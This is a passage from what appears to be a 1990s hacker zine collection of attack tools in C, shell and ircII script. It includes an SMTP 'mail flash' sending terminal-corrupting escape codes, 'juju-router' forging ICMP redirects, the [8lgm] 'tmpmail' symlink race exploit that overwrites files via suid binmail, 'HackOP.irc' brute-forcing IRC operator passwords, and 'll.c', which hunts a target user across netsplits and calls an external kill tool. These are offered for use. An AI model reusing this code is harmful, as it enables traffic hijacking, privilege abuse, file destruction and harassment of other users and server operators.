  4172.   connect(thesock,(struct sockaddr *) &sin, sizeof(sin));
  4173. }
  4174.  
  4175. void main(int argc, char **argv)
  4176. {
  4177.   char buf[1024];
  4178.   
  4179.   if (argc != 4) {
  4180.     printf("usage: mflash smtp_server from to\n");
  4181.     exit(0);
  4182.   }
  4183.   printf("Connecting to SMTP Server %s\n",argv[1]);
  4184.   smtp_connect(argv[1]);
  4185.   printf("Sending Mail Flash To %s\n",argv[3]);
  4186.   sprintf(buf, "helo a\nmail from: %s\nrcpt to: %s\ndata\nSUBJECT: \033c\033(0\033#8\033[1;3r\033[J\033[5m\033[?5h\n.\nquit\n",argv[2],argv[3]);
  4187.   send(thesock, buf, strlen(buf), 0);
  4188.   /* I am not sure how to check when this buffer is done being sent.
  4189.      If you are having any problems increase the sleep time below! */
  4190.   printf("Sleeping To Make Sure Data Is Sent ...\n");
  4191.   sleep(3);
  4192.   printf("Done!\n");
  4193. }
  4194.  
  4195. ------------------------------------------------------------------------------
  4196.  
  4197. [Editor's Note:  Does this work?  I don't think so, but a clever hacker might
  4198.  use the code to do something "interesting."  The concept is sound...the
  4199.  delivery needs a bit of tweaking.]
  4200.  
  4201. #include <netdb.h>
  4202. #include <sys/time.h>
  4203. #include <sys/types.h>
  4204. #include <sys/socket.h>
  4205. #include <netinet/in.h>
  4206. #include <netinet/in_systm.h>
  4207. #include <netinet/ip.h>
  4208. #include <netinet/ip_icmp.h>
  4209. #include <netinet/tcp.h>
  4210. #include <signal.h>
  4211. #include <errno.h>
  4212. #include <string.h>
  4213. #include <stdlib.h>
  4214. #include <stdio.h>
  4215.  
  4216. int 
  4217. resolver(host,saddr)
  4218.   char *host;
  4219.   struct sockaddr_in *saddr;
  4220. {
  4221.   struct hostent *h=gethostbyname(host);
  4222.  
  4223.   bzero(saddr,sizeof(struct sockaddr));
  4224.   saddr->sin_family=AF_INET;
  4225.   if (h!=NULL)
  4226.   {
  4227.     saddr->sin_family=h->h_addrtype;
  4228.     bcopy(h->h_addr,(caddr_t)&saddr->sin_addr,h->h_length);
  4229.     return(0);
  4230.   }
  4231.   else
  4232.   {
  4233.     fprintf(stderr,"juju-router: unknown host ``%s''\n",host);
  4234.     return(-1);
  4235.   }
  4236.   return(0);
  4237. }
  4238.  
  4239. in_cksum(addr,len)
  4240.   u_short *addr;
  4241.   int len;
  4242. {
  4243.   register int nleft = len;
  4244.   register u_short *w = addr;
  4245.   register int sum = 0;
  4246.   u_short answer = 0;
  4247.  
  4248.   /* This function was taking from existing ICMP nuke code and
  4249.      was presumably originally stripped from a ``ping.c'' implementation.
  4250.   */
  4251.  
  4252.   while( nleft > 1 )
  4253.   {
  4254.     sum+=*w++;
  4255.     nleft-=2l;
  4256.   }
  4257.   if( nleft == 1 )
  4258.   {
  4259.     *(u_char *)(&answer) = *(u_char *)w;
  4260.     sum+=answer;
  4261.   }
  4262.   sum=(sum>>16)+(sum& 0xffff);
  4263.   sum+=(sum>>16);
  4264.   answer=~sum;
  4265.   return(answer);
  4266. }
  4267.  
  4268. int
  4269. icmp_reroute(host,uhost,port,code)
  4270.   char *host, *uhost;
  4271.   int code, port;
  4272. {
  4273.   struct sockaddr_in       name;
  4274.   struct sockaddr          dest,    uspoof;
  4275.   struct icmp              *mp;
  4276.   struct tcphdr            *tp;
  4277.   struct protoent          *proto;
  4278.  
  4279.   int    i, s, rc;
  4280.   char   *buf=(char *) malloc(sizeof(struct icmp)+64);
  4281.  
  4282.   mp=(struct icmp *) buf;
  4283.  
  4284.   if (resolver(host,&dest)<0) return(-1);
  4285.   if (resolver(uhost,&uspoof)<0) return(-1);
  4286.  
  4287.   if ((proto=getprotobyname("icmp")==NULL))
  4288.   {
  4289.     fprintf(stderr,"fatal; unable to determine protocol number of ``icmp''\n");
  4290.     return(-1);
  4291.   }
  4292.   
  4293.   if ((s=socket(AF_INET,SOCK_RAW,proto->p_proto))<0) 
  4294.   {
  4295.     perror("opening raw socket");
  4296.     return(-1);
  4297.   }
  4298.   name.sin_family=AF_INET;
  4299.   name.sin_addr.s_addr=INADDR_ANY;
  4300.   name.sin_port=htons(port);
  4301.  
  4302.   if ((rc=bind(s,(struct sockaddr *) &name, sizeof(name)))==-1)
  4303.   {
  4304.     fprintf(stderr,"fatal; error binding sockets\n");
  4305.     return(-1);
  4306.   }
  4307.  
  4308.   if ((proto=getprotobyname("tcp")==NULL))
  4309.   {
  4310.     fprintf(stderr,"fatal; unable to determine protocol number of ``tcp''\n");
  4311.     return(-1);
  4312.   }
  4313.  
  4314.   bzero(mp,sizeof(struct icmp)+64);
  4315.   mp->icmp_type         = ICMP_REDIRECT;
  4316.   mp->icmp_code         = code;
  4317.   mp->icmp_ip.ip_v      = IPVERSION;
  4318.   mp->icmp_ip.ip_hl     = 5;
  4319.   mp->icmp_ip.ip_len    = htons(sizeof(struct ip)+64+20);
  4320.   mp->icmp_ip.ip_p      = IPPROTO_TCP;
  4321.   mp->icmp_ip.ip_src    = ((struct sockaddr_in *)&dest)->sin_addr;
  4322.   mp->icmp_ip.ip_dst    = ((struct sockaddr_in *)&dest)->sin_addr;
  4323.   mp->icmp_gwaddr       = ((struct sockaddr_in *)&uspoof)->sin_addr;
  4324.   mp->icmp_ip.ip_ttl    = 150;
  4325.   mp->icmp_cksum        = 0;
  4326.   tp=(struct tcphdr *)((char *)&mp->icmp_ip+sizeof(struct ip));
  4327.   tp->th_sport          = 23;
  4328.   tp->th_dport          = htons(1499);
  4329.   tp->th_seq            = htonl(0x275624F2);
  4330.   mp->icmp_cksum        = htons(in_cksum(mp,sizeof(struct icmp)+64));
  4331.  
  4332.   if ((i=sendto(s,buf,sizeof(struct icmp)+64,0,&dest,sizeof(dest)))<0)
  4333.   {
  4334.     fprintf(stderr,"fatal; error sending forged packet\n");
  4335.     return(-1);
  4336.   }
  4337.   return(0);
  4338. }
  4339.  
  4340. void
  4341. main(argc,argv)
  4342.   int argc;
  4343.   char **argv;
  4344. {
  4345.   int i, code;
  4346.  
  4347.   if ((argc<4) || (argc>5))
  4348.   {
  4349.     fprintf(stderr,"usage: juju-router target new-destination port code\n");
  4350.     fprintf(stderr,"codes: 0 _REDIRECT_NET    1 _REDIRECT_HOST (default)\n");
  4351.     fprintf(stderr,"       2 _REDIRECT_TOSNET 2 _REDIRECT_TOSHOST\n");  
  4352.     exit(1);
  4353.   }
  4354.  
  4355.   printf("juju-router: rerouting dynamically....");
  4356.   if (code!=0 && code!=1 && code!=2 && code!=3) code=0;
  4357.   if (icmp_reroute(argv[1],argv[2],argv[3],code)<0)
  4358.   {
  4359.     printf("failed.\n");
  4360.     exit(1);
  4361.   }
  4362.   printf("succeeded.\n");
  4363.   exit(0);
  4364. }
  4365.  
  4366. ------------------------------------------------------------------------------
  4367.  
  4368. #!/bin/sh
  4369. # tmpmail: overwrite files using binmail
  4370. #
  4371. # Usage: tmpmail to-file
  4372. #
  4373. # (c) [8lgm] 1994, tested under SunOS 4.1.2.
  4374. #
  4375. #
  4376. # Note: Script only works if mail is suid root.
  4377. #       Other vendors may use tmpnam("ma").
  4378. #
  4379. # This vulnerability can be exploited for sgid
  4380. # mail binmails, the only modification would
  4381. # be to predict the pid of the mail process
  4382. # created by sendmail.  This would be 4 forward
  4383. # of the current pid - assuming a 'quiet' system.
  4384. #
  4385. # Will create to-file, or truncate.
  4386.  
  4387. PATH=/usr/ucb:/usr/bin:/bin      export PATH
  4388. IFS=" "                          export IFS
  4389.  
  4390. PROG="`basename $0`"
  4391.  
  4392. # Check args
  4393. if [ $# -ne 1 ]; then
  4394.         echo "Syntax: $PROG to-file"
  4395.         exit 1
  4396. fi
  4397.  
  4398. TO_FILE="$1"
  4399.  
  4400. # Check we're on SunOS
  4401. if [ "x`uname -s`" != "xSunOS" ]; then
  4402.         echo "Sorry, this only works on SunOS"
  4403.         exit 1
  4404. fi
  4405.  
  4406. # Create our racing program!
  4407.  
  4408. cat > mailrace.c << 'EOF'
  4409. #include <stdio.h>
  4410. #include <unistd.h>
  4411.  
  4412. char path[] = "/tmp/maaXXXX";
  4413.  
  4414. main(argc,argv)
  4415. int argc;
  4416. char **argv;
  4417. {
  4418.   int pid;
  4419.   char *trv;
  4420.  
  4421.   if (argc != 3) {
  4422.     fprintf(stderr, "Usage: %s pid tofile\n", argv[0]);
  4423.     exit(1);
  4424.   }
  4425.  
  4426.   pid = atoi(argv[1]);
  4427.  
  4428. /* Stolen from mktemp.c */
  4429.   for (trv = path; *trv; ++trv);          /* extra X's get set to 0's */
  4430.   while (*--trv == 'X') {
  4431.     *trv = (pid % 10) + '0';
  4432.     pid /= 10;
  4433.   }
  4434.  
  4435.   symlink("/tmp/ShortSong", path);
  4436.   while(symlink(argv[2], path));
  4437.   exit(0);
  4438. }
  4439. EOF
  4440. cc -o mailrace mailrace.c
  4441.  
  4442. # Check we now have mailrace
  4443. if [ ! -x "mailrace" ]; then
  4444.         echo "$PROG: couldnt compile mailrace.c - check it out"
  4445.         exit 1
  4446. fi
  4447.  
  4448. # create some input for binmail
  4449. echo localhost $USER > /tmp/BlueRoom.$$
  4450. ./mailrace $$ $TO_FILE &
  4451. exec /bin/mail -d $LOGNAME < /tmp/BlueRoom.$$
  4452.  
  4453. ------------------------------------------------------------------------------
  4454. ###############################################################################
  4455.  
  4456. #  #  ##   ### #  #  ##  ###          Attempts to hack  IRC  operator status by 
  4457. #  # #  # #    # #  #  # #  #         flooding the  server with bogus passwords 
  4458. #### #### #    ##   #  # #  #         of various lengths.  Works on all servers
  4459. #  # #  # #    # #  #  # ###          I've tested so far..
  4460. #  # #  #  ### #  #  ##  #  v1.3+path                             - Illegible 8
  4461.  
  4462. ###############################################################################
  4463. set NOVICE off
  4464.  
  4465. # #
  4466. ###  Bogus passwords.. don't change these.  Other passwords don't work. (?)
  4467. # #
  4468. @ HackOP.A = [EACAGCGPGGGICADNCAFLGJGMGMGFGHGJGCGMDIFN]
  4469. @ HackOP.B = [FOGPGOCAFOGNGPGEGFCACCCFCACFCACLHHHDCCCAGFGDGIGPCACKCKCKCAENGPGEGFCAGDGIGBGOGHGFCACCCLGPHDHHCCCAGGGPHCCAHFHDGFHCCACEEOCAGCHJCACEEODLHDGFHECAFDFEEBFEFFFDFPFFENEPEEEFCACACICLGPCFCDCJ]
  4470. @ HackOP.C = [FOGPGOCACDCNHDGFGOGEFPGNHDGHCADBCACKCAHLCPCPFOGOGPHEGJGDGFCACEGCGPGGGICACEEOCACNDOCACKCEDACKCACEDBCNHN]
  4471. @ HackOP.D = [GNGPGEGFCAEKHFGHGHGMGFHCCACLHDHH]
  4472. @ HackOP.E = [GFGDGIGPCACKCKCKCAFJGPHFCAGBHCGFCAGOGPHHCAGBGOCAEJFCEDCAEPHAGFHCGBHEGPHC]
  4473. @ HackOP.F = [FOGPGOCAGNGPGEGFCACNCCCFCACFCACLHHHDCC]
  4474. @ HackOP.G = [FOGPGOCACDCNHCGBHHFPGJHCGDCADACACCCFCADDDBDCCACKCCCAHLGJGGCACIFLCEDDFNDNDNFLCEEOFNCJCAHLHEGJGNGFHCCADACAGFGDGIGPCACKCKCKCACEDDCAGJHDCAGBGOCAEJFCEDCAEPHAGFHCGBHEGPHCHNHN]
  4475. @ HackOP.H = [EACAFDFEEBFEFFFDFPFFENEPEEEFCADNCAFLCAFMCICLGPCFCDFMCJFN]
  4476. @ HackOP.I = [FOGPGOCAFOGDHEGDHACACCCFCACFCAEJFCEDEPFACACKCCCAHLEACAGCGPGGGICADNCAFLCEDAFNDLCPCPFOGOGPHEGJGDGFCACEGCGPGGGICAEIGPCAGIGPCAGIGPCBHN]
  4477. @ HackOP.J = [FOGPGOCAFOGDHEGDHACACCCFCACFCAEJFCEDEPFHCACKCCCAHLGJGGCACIFLCEDAFNDNDNFLCEGCGPGGGIFNCJCAHLCEDDCNDLCPCPFOGOGPHEGJGDGFCACEDACAGEGPGJGOGHDKCACEDDCNHNHN]
  4478. @ HackOP.K = [FOGBGMGJGBHDCAGLGJGMGMCAGJGGCACIFLCEDAFNCJCAHLCPCPFOHDGJGHGOGPGGGGCAELGJGMGMCAGGHCGPGNCACEEOCAFMCICEDACNFMCJHNHLCPCPELEJEMEMHN]
  4479. @ HackOP.L = [FOGPGOCACDFOHCGBHHFPGJHCGDCADACACCCFCADEDADBCACFCACFCADKEOGPCKCCCAHLGJGGCACIFLCEDDFNCBDNFLCEGCGPGGGIFNCJCAHLGFGDGIGPCACKCKCKCACEHDHEHCGJHACIDKCACEDDCNCJHNHLEACAGCGPGGGICADNCAFLDNDAFNHNHN]
  4480. @ HackOP.M = [GFHGGBGMCACPCPFOGOGPHEGJGDGFCACEGCGPGGGICAFCHFGOGOGJGOGHCAEIGBGDGLEPFACACNCACEHEGJGNGFCICJ]
  4481. @ HackOP.N = [FOGBGMGJGBHDCAHDHBHFGJHECAHLCPCPFOHDGJGHGOGPGGGGCACPHDHBHFGJHECACEDACNHN]
  4482. @ HackOP.O = [FOGBGMGJGBHDCAGDGPGOGOGFGDHECAGJGGCACIFLCEDAFNCJCAHLHNHLHNDLGFGDGIGPCACKCKCKCAEDEPEOEOEFEDFECAEOGPHECAGFGOGPHFGHGICAHAGBHCGBGNGFHEGFHCHD]
  4483. @ HackOP.P = [FOHDGFHECAGFHIGFGDFPHAHCGPHEGFGDHEGJGPGOCAGPGGGG]
  4484. @ HackOP.Q = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAGFHGGBGMCAFMFMCECEGEGFGDGPGEGFFMFMFMCICEHLEIGBGDGLGPHACOEJHNFMFMFMCJCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD]
  4485. @ HackOP.R = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAGFHGGBGMCAFMFMCECEGEGFGDGPGEGFFMFMFMCICEHLEIGBGDGLGPHACOEKHNFMFMFMCJCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD]
  4486. @ HackOP.S = [GFHGGBGMCAFOGFHIGFGDCAGFGDGIGPCAEACAGCGPGGGICADNCAFLCEGCGPGGGIFNCADODOCEHLEIEPENEFHNCPCOGJHCGDHCGD]
  4487. @ HackOP.Z = [FOGBGMGJGBHDCACNHBHFGPHEGF]
  4488.  
  4489. # #
  4490. ###  Ignore failed hack attempts..
  4491. # #
  4492. on #^raw_irc "% 491 *No O-lines*" #
  4493.  
  4494. # #
  4495. ###  Poke server (causes a "POKE : unknown command" reply)
  4496. # #
  4497. @ hackop.poke.junk = [FOGBGMGJGBHDCAHBHFGPHEGFCAHLCEGEGFGDGPGEGFCICEDCCNCJHN]
  4498. alias hackop.poke {
  4499.     quote POKE \\;$decode($hackop.poke.junk)
  4500.     wait
  4501. }
  4502.  
  4503. # #
  4504. ###  Send bogus passwords..
  4505. # #
  4506. alias hackop.hack {
  4507.     foreach HackOP XX {
  4508.         if ([$(HackOP.$XX)]!=[]) {quote OPER $N $(HackOP.$XX)}
  4509.         wait
  4510.     }
  4511. }
  4512.  
  4513. # #
  4514. ###  Attempt to hack ops..
  4515. # #
  4516. alias hackop {
  4517.     umode -sw
  4518.     echo [HackOP] Poking server.. (should reply with error message)
  4519.     hackop.poke
  4520.     echo [HackOP] Attempting to hack IrcOps..
  4521.     hackop.hack
  4522. }
  4523.  
  4524. # #
  4525. ###  Help..
  4526. # #
  4527. alias hackhelp {
  4528.     echo
  4529.     echo [HackOP] You have loaded HackOP.irc v1.3+path from Illegible 8.
  4530.     echo [HackOP]
  4531.     echo [HackOP] This script attempts to hack IRC Operator status on
  4532.     echo [HackOP] your current server.  To use it just type /hackop.
  4533.     echo [HackOP]
  4534.     echo [HackOP] Aliases added:  /hackhelp /hackop /kpath
  4535.     echo [HackOP]
  4536.     echo [HackOP] Enjoy it.. /kill your friends. 8-)
  4537.     echo
  4538. }
  4539.  
  4540. # #
  4541. ###  The following code is taken from the ircII 2.2.9 distribution...
  4542. # #
  4543.  
  4544. ###############################################################################
  4545. #
  4546. # No Kill Path Script II
  4547. #
  4548. # converted to 2.2.1 by phone
  4549. # CONVERTED for ircII2.2
  4550. # Version for servers 2.7.1* by Nap@irc <pioch@poly.polytechnique.fr>
  4551. # Original script from YeggMan
  4552. # Simplification by Daemon
  4553. # This version works both with old and new 2.7.1e kill formats !
  4554.  
  4555. @ kpath.kpath = [<empty>]
  4556. alias kpath echo ### Last received KILL Path: $kpath.kpath
  4557.  
  4558. alias kpath.ridx @ function_return = RINDEX(! $0) + 1
  4559. alias kpath.is_serv @ function_return  = INDEX(. $MID($kpath.ridx($0) 512 $0))
  4560. alias kpath.opkill echo ### KILL for $0 $MID($kpath.ridx($1) 9 $1) $2-
  4561. alias kpath.svkill echo ### ServerKill for $0
  4562.  
  4563. on ^server_notice "% * Notice -- Received KILL*" {
  4564.         if ([$9] == [From])
  4565.     {
  4566.         ^assign kpath.kpath $12-
  4567.         if (kpath.is_serv($12) > -1)
  4568.         { kpath.svkill $8 }
  4569.         { kpath.opkill $8 $10 $13- }
  4570.     }
  4571.     {
  4572.         ^assign kpath.kpath $10-
  4573.         if (kpath.is_serv($10) > -1)
  4574.         { kpath.svkill $8 }
  4575.         { kpath.opkill $8 $10 $11- }
  4576.     }
  4577. }
  4578. ###[End of stolen code]########################################################
  4579.  
  4580. # #
  4581. ###  HackOP loaded message, misc stuff.
  4582. # #
  4583. alias umode mode $N $0-
  4584. echo [HackOP] HackOP.irc v1.3+path loaded.  Type /hackhelp for help
  4585.  
  4586. ------------------------------------------------------------------------------
  4587.  
  4588. [Editor's Note:  This is used in conjunction with the next program]
  4589.  
  4590. /*=============================================================*\
  4591.  * ll.c - link looker                                          *
  4592.  * Copyright (C) 1994 by The Software System                   *
  4593.  * Written by George Shearer (george@sphinx.biosci.wayne.edu)  *
  4594. \*=============================================================*/
  4595.  
  4596. /* This program is free software; you can redistribute it and/or modify
  4597.  * it under the terms of the GNU General Public License as published by
  4598.  * the Free Software Foundation; either version 2 of the License, or
  4599.  * (at your option) any later version.
  4600.  *
  4601.  * This program is distributed in the hope that it will be useful,
  4602.  * but WITHOUT ANY WARRANTY; without even the implied warranty of
  4603.  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  4604.  * GNU General Public License for more details.
  4605.  *
  4606.  * You should have received a copy of the GNU General Public License
  4607.  * along with this program; if not, write to the Free Software
  4608.  * Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  4609.  */
  4610.  
  4611. #define BUFSIZE    400            /* IRC Server buffer */
  4612. #define SERVER    "irc.escape.com"    /* IRC Server        */
  4613. #define PORT    6667            /* IRC Port          */
  4614. #define DELAYS    30            /* Loop delay seconds*/
  4615. #define TIMEOUT    30            /* connection timeout*/
  4616.  
  4617. #define ESTABLISHED    1
  4618. #define INPROGRESS    2
  4619. #define SPLIT        1
  4620.  
  4621. unsigned short int session=0,link_count=0;
  4622. char in[BUFSIZE],out_buf[BUFSIZE],hostname[64];
  4623. char *ins=in;
  4624. char *dedprsn, *kradprsn;
  4625.  
  4626. #include <stdio.h>
  4627. #include <string.h>
  4628. #include <stdlib.h>
  4629. #include <unistd.h>
  4630. #include <sys/types.h>
  4631. #include <sys/time.h>
  4632. #include <fcntl.h>
  4633. #include <signal.h>
  4634. #include <errno.h>
  4635. #include <netinet/in.h>
  4636. #include <sys/socket.h>
  4637. #include <netdb.h>
  4638. #include <arpa/inet.h>
  4639.  
  4640. struct irc_server {
  4641.   char *name;
  4642.   char *link;
  4643.   unsigned short int status;
  4644.   struct irc_server *next;
  4645. } *sl1=(struct irc_server *)0,*sl2=(struct irc_server *)0;
  4646.  
  4647. void do_ping(char *,char *);
  4648. void do_001(char *,char *);
  4649. void do_error(char *,char *);
  4650. void do_364(char *,char *);
  4651. void do_365(char *,char *);
  4652.  
  4653. struct parsers {
  4654.    char *cmd;
  4655.    void (*func)(char *,char *);
  4656. } parsefuns[] = {
  4657.    { "PING", (void *)do_ping },
  4658.    { "001", (void *)do_001 },
  4659.    { "364",(void *)do_364 },
  4660.    { "365", (void *)do_365},
  4661.    { "ERROR",(void *)do_error},
  4662.    { (char *)0,(void *)0 }
  4663. };
  4664.  
  4665. struct sockaddr_in server;
  4666. int sock=0;
  4667.  
  4668. unsigned long int
  4669. resolver(char *host) {
  4670.   unsigned long int ip=0L;
  4671.  
  4672.   if(host && *host && (ip=inet_addr(host))==-1) {
  4673.     struct hostent *he;
  4674.     int x=0;
  4675.  
  4676.     while(!(he=gethostbyname((char *)host)) && x++<3) {
  4677.       printf("."); fflush(stdout);
  4678.       sleep(1);
  4679.     }
  4680.     ip=(x<3) ? *(unsigned long *)he->h_addr_list[0] : 0L;
  4681.   }
  4682.  
  4683.   return(ip);
  4684. }
  4685.  
  4686. void
  4687. clean_sl2(void) {
  4688.   while(sl2) {
  4689.     struct irc_server *temp=sl2->next;
  4690.     if(sl2->name)
  4691.       free(sl2->name);
  4692.     if(sl2->link)
  4693.       free(sl2->link);
  4694.     free(sl2);
  4695.     sl2=temp;
  4696.   }
  4697.   sl2=(struct irc_server *)0;
  4698. }
  4699.  
  4700. void
  4701. exit_program(char *why) {
  4702.   printf("\nExiting program. (%s)\n",why);
  4703.  
  4704.   if(sock)
  4705.     close(sock);
  4706.  
  4707.   while(sl1) {
  4708.     struct irc_server *temp=sl1->next;
  4709.     if(sl1->name)
  4710.       free(sl1->name);
  4711.     if(sl1->link)
  4712.       free(sl1->link);
  4713.     free(sl1);
  4714.     sl1=temp;
  4715.   }
  4716.  
  4717.   clean_sl2();
  4718.  
  4719.   if(in)
  4720.     free(in);
  4721.  
  4722.   exit(0);
  4723. }
  4724.  
  4725. int mystrccmp(register char *s1,register char *s2) {
  4726.    while((((*s1)>='a'&&(*s1)<='z')?(*s1)-32:*s1)==
  4727.         (((*s2)>='a'&&(*s2)<='z')?(*s2++)-32:*s2++))
  4728.      if(*s1++==0) return 0;
  4729.    return (*(unsigned char *)s1-*(unsigned char *)--s2);
  4730. }
  4731.  
  4732. char *mstrcpy(char **to,char *from) {
  4733.   if(from) {
  4734.     if((*to=(char *)malloc(strlen(from)+1)))
  4735.       strcpy(*to,from);
  4736.   }
  4737.   else
  4738.     *to=(char *)0;
  4739.   return(*to);
  4740. }
  4741.  
  4742. char *digtoken(char **string,char *match) {
  4743.   if(string && *string && **string) {
  4744.     while(**string && strchr(match,**string))
  4745.       (*string)++;
  4746.     if(**string) { /* got something */
  4747.       char *token=*string;
  4748.       if((*string=strpbrk(*string,match))) {
  4749.         *(*string)++=(char)0;
  4750.         while(**string && strchr(match,**string))
  4751.           (*string)++;
  4752.       }
  4753.       else
  4754.         *string = ""; /* must be at the end */
  4755.       return(token);
  4756.     }
  4757.   }
  4758.   return((char *)0);
  4759. }
  4760.  
  4761. void signal_handler(void) {
  4762.   exit_program("caught signal");
  4763. }
  4764.  
  4765. void signal_alarm(void) {
  4766.   exit_program("timed out waiting for server interaction.");
  4767. }
  4768.  
  4769. void
  4770. out(void) {
  4771.   int length=strlen(out_buf);
  4772.   errno=0;
  4773.   if(write(sock,out_buf,length)!=length)
  4774.     exit_program((char *)errno);
  4775. }
  4776.  
  4777. void
  4778. init_server(void) {
  4779.   int length;
  4780.  
  4781.   sprintf(out_buf,"USER kil kil kil :ded kilr huntin %s\nNICK kil%d\nPRIVMSG %s :ded kilr hunting %s\n",
  4782.     dedprsn, getpid(), kradprsn, dedprsn);
  4783.   length=strlen(out_buf);
  4784.  
  4785.   errno=0;
  4786.  
  4787.   if(write(sock,out_buf,length)==length) {
  4788.     puts("established");
  4789.     session=ESTABLISHED;
  4790.     alarm(TIMEOUT);
  4791.     sprintf(out_buf,"LINKS\n");
  4792.     out();
  4793.   }
  4794.   else
  4795.     exit_program((char *)errno);
  4796. }
  4797.  
  4798. void
  4799. heartbeat(void) {
  4800.   strcpy(out_buf,"LINKS\n");
  4801.   out();
  4802.   signal(SIGALRM,(void *)heartbeat);
  4803.   alarm(DELAYS);
  4804. }
  4805.  
  4806. void
  4807. do_364(char *from,char *left) {
  4808.   struct irc_server *serv;
  4809.   char *sv1,*sv2;
  4810.   char *nick;
  4811.  
  4812.   serv=(struct irc_server *)malloc(sizeof(struct irc_server));
  4813.   serv->next=sl2;
  4814.  
  4815.   serv->status=0;
  4816.   nick=digtoken(&left," ");
  4817.   sv1=digtoken(&left," ");
  4818.   sv2=digtoken(&left," ");
  4819.  
  4820.   mstrcpy(&serv->name,sv1);
  4821.   mstrcpy(&serv->link,sv2);
  4822.   sl2=serv;
  4823. }
  4824.  
  4825. int
  4826. findserv(struct irc_server *serv,char *name) {
  4827.   for(;serv;serv=serv->next)
  4828.     if(!mystrccmp(name,serv->name))
  4829.       return(1);
  4830.   return(0);
  4831. }
  4832.  
  4833. void
  4834. do_365(char *from,char *left) {
  4835.   struct irc_server *serv=sl1;
  4836.   char kilstring[150];
  4837.  
  4838.   for(;serv;serv=serv->next) {
  4839.     if(!findserv(sl2,serv->name)) {
  4840.       if(!(serv->status & SPLIT)) {
  4841.         printf("Split server  : %s [%s]\n",serv->name,serv->link);
  4842.         serv->status|=SPLIT;
  4843.       }
  4844.     }
  4845.     else
  4846.       if(serv->status & SPLIT) {
  4847.         printf("Merging server: %s [%s]\n",serv->name,serv->link);
  4848.         sprintf(kilstring, "mcb %s %s:%s %s&",
  4849.           kradprsn, dedprsn, serv->name, serv->link);
  4850.         system(kilstring);
  4851.         serv->status&=~SPLIT;
  4852.       }
  4853.   }
  4854.  
  4855.   serv=sl2;
  4856.  
  4857.   for(;serv;serv=serv->next) {
  4858.     if(!findserv(sl1,serv->name)) {
  4859.       struct irc_server *serv2;
  4860.  
  4861.       serv2=(struct irc_server *)malloc(sizeof(struct irc_server));
  4862.       serv2->next=sl1;
  4863.       serv2->status=0;
  4864.       mstrcpy(&serv2->name,serv->name);
  4865.       mstrcpy(&serv2->link,serv->link);
  4866.       sl1=serv2;
  4867.       if(link_count) {
  4868.         printf("Added server  : %s [%s]\n",serv->name,serv->link);
  4869.         sprintf(kilstring, "mcb %s %s:%s %s&",
  4870.           kradprsn, dedprsn, serv->name, serv->link);
  4871.         system(kilstring);
  4872.       }
  4873.     }
  4874.   }
  4875.  
  4876.   link_count=1;
  4877.   clean_sl2();
  4878. }
  4879.  
  4880. void
  4881. do_ping(char *from,char *left) {
  4882.   sprintf(out_buf,"PING :%s\n",hostname);
  4883.   out();
  4884. }
  4885.  
  4886. void
  4887. do_001(char *from,char *left) {
  4888.   printf("Logged into server %s as nickname kil%d\n",from,getpid());
  4889.   printf("Hunting %s\n\n", dedprsn);
  4890.   alarm(0);
  4891.   signal(SIGALRM,(void *)heartbeat);
  4892.   alarm(DELAYS);
  4893. }
  4894.  
  4895. void
  4896. do_error(char *from,char *left) {
  4897.   printf("Server error: %s\n",left);
  4898. }
  4899.  
  4900. void
  4901. parse2(void) {
  4902.   char *from,*cmd,*left;
  4903.  
  4904.   if(*ins==':') {
  4905.     if(!(cmd=strchr(ins,' ')))
  4906.       return;
  4907.     *cmd++=(char)0;
  4908.     from=ins+1;
  4909.   }
  4910.   else {
  4911.     cmd=ins;
  4912.     from=(char *)0;
  4913.   }
  4914.   if((left=strchr(cmd,' '))) {
  4915.     int command;
  4916.     *left++=(char)0;
  4917.     left=(*left==':') ? left+1 : left;
  4918.     for(command=0;parsefuns[command].cmd;command++) {
  4919.       if(!mystrccmp(parsefuns[command].cmd,cmd)) {
  4920.         parsefuns[command].func(from,left);
  4921.         break;
  4922.       }
  4923.     }
  4924.   }
  4925. }
  4926.  
  4927. void
  4928. parse(int length) {
  4929.   char *s=in;
  4930.  
  4931.   *(ins+length)=(char)0;
  4932.  
  4933.   for(;;) {
  4934.     ins=s;
  4935.     while(*s && *s!=(char)13 && *s!=(char)10)
  4936.       s++;
  4937.     if(*s) {
  4938.       while(*s && (*s==(char)13 || *s==(char)10))
  4939.         *s++=(char)0;
  4940.       parse2();
  4941.     }
  4942.     else
  4943.       break;
  4944.   }
  4945.   strcpy(in,ins);
  4946.   ins=in+(s-ins);
  4947. }
  4948.  
  4949. void
  4950. process_server(void) {
  4951.   int x=0;
  4952.  
  4953.   for(;;) {
  4954.     fd_set rd,wr;
  4955.     struct timeval timeout;
  4956.  
  4957.     timeout.tv_usec=0; timeout.tv_sec=1;
  4958.     FD_ZERO(&rd); FD_ZERO(&wr);
  4959.  
  4960.     FD_SET(sock,&rd);
  4961.     if(session==INPROGRESS)
  4962.       FD_SET(sock,&wr);
  4963.  
  4964.     errno=0;
  4965.     select(getdtablesize(),&rd,&wr,NULL,(session==INPROGRESS)
  4966.            ? (struct timeval *)&timeout : NULL);
  4967.  
  4968.     if(errno==EINTR)
  4969.       continue;
  4970.  
  4971.     errno=0;
  4972.     if(session==INPROGRESS) {
  4973.       if(FD_ISSET(sock,&wr)) {
  4974.         init_server();
  4975.          continue;
  4976.       }
  4977.       else {
  4978.         if(x++>=TIMEOUT)
  4979.           exit_program("connection timed out");
  4980.         printf("."); fflush(stdout);
  4981.       }
  4982.     }
  4983.  
  4984.     if(FD_ISSET(sock,&rd)) {
  4985.       int length=read(sock,ins,BUFSIZE-(ins-in));
  4986.  
  4987.       if(length<1) {
  4988.         if(session!=INPROGRESS)
  4989.           if(!errno) {
  4990.             puts("Connection closed by foreign host.");
  4991.             errno=ENOTCONN;
  4992.           }
  4993.           else
  4994.             printf("Connection to %s closed.\n",
  4995.                    inet_ntoa(server.sin_addr));
  4996.         exit_program((char *)errno);
  4997.       }
  4998.       if(strpbrk(in,"\x0a\x0d"))
  4999.         parse(length);
  5000.       else
  5001.         ins=(BUFSIZE-((ins+length)-in)<1)?in:ins+length;
  5002.     }
  5003.   }
  5004. }
  5005.  
  5006. void
  5007. main(int argc,char *argv[]) {
  5008.   char serverhost[80];
  5009.   unsigned short int sport=PORT;
  5010.  
